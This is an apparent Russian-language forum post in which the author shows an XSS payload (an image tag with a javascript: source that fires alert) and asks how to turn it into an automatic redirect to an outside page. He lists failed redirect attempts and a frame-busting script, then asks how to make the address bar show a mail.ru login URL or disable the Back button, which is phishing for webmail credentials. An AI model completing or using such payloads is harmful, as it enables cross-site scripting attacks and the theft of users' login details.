1.
Ну, допустим, есть скрипт:
<image src=javascript&#10:alert(xss)>
Действительно работает (в смысле alert выдает).

Но вот что писать вместо [alert(xss)] если мне надо замутить редирект на http://pupkin.ru/vasya.html (автоматически и в том же окне)?
Пытался сделать так:
<image src=javascript&#10:document.location.replace('http://pupkin.ru/vasya.html')>
или
<image src=javascript&#10:onLoad=window.location=("http://pupkin.ru/vasya.html")>
Без мазы.
Есть подозрения, что я облажался с синтаксисом.

Есть еще такая штука:
<SCRIPT type="text/javascript" LANGUAGE="JavaScript">
<!--
if (self.parent.frames.length == 0)
self.parent.location="http://pupkin.ru/vasya.html";
// -->
</SCRIPT>
Но как это все оформить в одну строчку???



2.
А кто-нибудь знает можно ли заменить в адресной строке [http://pupkin.ru/vasya.html] например на [http://win.mail.ru/cgi-bin/auth] или хотя бы отключить кнопку "Back"?